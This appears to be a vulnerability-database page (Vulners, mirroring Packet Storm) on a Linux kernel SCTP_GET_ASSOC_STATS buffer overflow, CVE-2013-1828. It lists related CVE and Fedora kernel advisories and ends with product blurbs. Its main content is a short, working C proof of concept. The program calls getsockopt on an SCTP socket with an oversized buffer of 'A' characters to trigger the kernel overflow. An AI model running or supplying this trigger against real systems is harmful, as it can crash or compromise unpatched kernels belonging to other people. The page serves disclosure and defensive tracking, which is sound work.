Lucene search
K

Linux Kernel SCTP_GET_ASSOC_STATS() Buffer Overflow

🗓️ 13 Mar 2013 00:00:00Reported by Petr MatousekType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Linux Kernel SCTP_GET_ASSOC_STATS Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2013-1828
22 Mar 201310:00
cve
Cvelist
CVE-2013-1828
22 Mar 201310:00
cvelist
Debian CVE
CVE-2013-1828
22 Mar 201310:00
debiancve
EUVD
EUVD-2013-1846
7 Oct 202500:30
euvd
Fedora
[SECURITY] Fedora 18 Update: kernel-3.10.13-101.fc18
3 Oct 201301:12
fedora
Fedora
[SECURITY] Fedora 18 Update: kernel-3.10.14-100.fc18
10 Oct 201300:56
fedora
Fedora
[SECURITY] Fedora 18 Update: kernel-3.10.9-100.fc18
23 Aug 201300:32
fedora
Fedora
[SECURITY] Fedora 18 Update: kernel-3.9.9-201.fc18
12 Jul 201303:11
fedora
Fedora
[SECURITY] Fedora 18 Update: kernel-3.11.7-100.fc18
13 Nov 201302:17
fedora
Fedora
[SECURITY] Fedora 17 Update: kernel-3.8.4-102.fc17
30 Mar 201321:27
fedora
Rows per page
`#include <stdio.h>  
#include <string.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
  
#define SCTP_GET_ASSOC_STATS 112  
#define SOL_SCTP 132  
  
int main(void)  
{  
char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  
socklen_t len = strlen(buf);  
int fd;  
  
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);  
getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation